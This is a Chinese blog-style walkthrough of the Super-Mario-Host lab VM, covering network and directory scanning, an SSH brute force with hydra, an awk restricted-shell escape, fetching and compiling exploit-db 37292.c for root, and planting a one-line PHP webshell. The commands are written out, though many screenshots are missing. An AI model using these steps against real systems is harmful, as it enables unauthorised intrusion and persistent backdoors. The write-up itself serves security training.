Super-Mario-Host

Super-Mario-Host实验步骤

一 实验环境

攻击机:kali 192.168.62.128
靶机: ubuntu 192.168.62.129

二 实验步骤

  1. nmap - sP 192.168.62.0/24 扫描靶机ip地址
    在这里插入图片描述
  2. nmap -A 192.168.2.129 扫描靶机详细信息(端口开放,物理地址等)可以看出22端口,8180端口开放 可以尝试进行网站访问

在这里插入图片描述
3.
ip地址加端口进行访问,以看到主页没有什么有用信息。接下来使用dirb分别对默认字典和大字典对靶机进行目录探测,探测结果如下:
在这里插入图片描述
dirb http://192.168.62.129:8180/usr/share/dirb/wordlists/big.txt 进行大文件目录扫描

在这里插入图片描述
在这里插入图片描述

访问/vhosts文件先试试,果然有点重要信息 可以看出主机名称
在这里插入图片描述
5. 在物理机的C:\Windows\System32\drivers\etc\hosts文件中添加配置信息并保存。

在这里插入图片描述
如果遇到hosts文件权限保存不了的问题,可以把hosts文件拖到桌面进行编辑,然后再放回就行。

  1. 访问 http://mario.supermariohost.local:8180 成功,查看页面源代码以及访问 ’ Mark Robbins ‘、’ here ’ 超链接,没有发现什么有用信息。
    在这里插入图片描述
  2. 使用 ’ 御剑后台扫描工具 ’ 对域名mario.supermariohost.local:8180进行扫描,得到以下地址,逐一对其进行访问,在mario.supermariohost.local:8180/luigi.php 中发现敏感信息。

在这里插入图片描述
8. 访问 http://mario.supermariohost.local:8180/luigi.php 查看

在这里插入图片描述

  1. 通过出现的这些内容生成字典,进行下一步渗透。 使用命令生成自定义字典:

在这里插入图片描述
10. 使用john 生成密码本 john --wordlist=pass.txt --stdout --rules > passwords

  1. 下一步使用hydra来爆破ssh 22端口

在这里插入图片描述
12. ssh远程连接靶机 ssh luigi@192.168.62.129

在这里插入图片描述
13. 连接成功,获取shell,但是权限低,需要提权,输入help指令查看有哪些可以用的指令信息
在这里插入图片描述
14 可以看到AWK指令可以对提权有帮助

awk ‘BEGIN{system("/bin/bash")}’

在这里插入图片描述
在这里插入图片描述
15. 查看系统信息,内核信息 然后找漏洞

在这里插入图片描述
将该漏洞拷贝到Kali的共享目录/var/www/html目录下,并开启apsche服务。
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html/37292.c (复制指令)

service apache2 start(开启apache指令)
在这里插入图片描述
16. wget http://192.168.62.129:/37292.c (在ssh的登录界面下载该漏洞,kali的ip)。
在这里插入图片描述
17. 编译该C语言脚本并执行,成功拿到 root 权限。并且在/var/www/html下写一句话木马,保存在文件index.php中。

在这里插入图片描述
18. 使用中国 进行查看

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值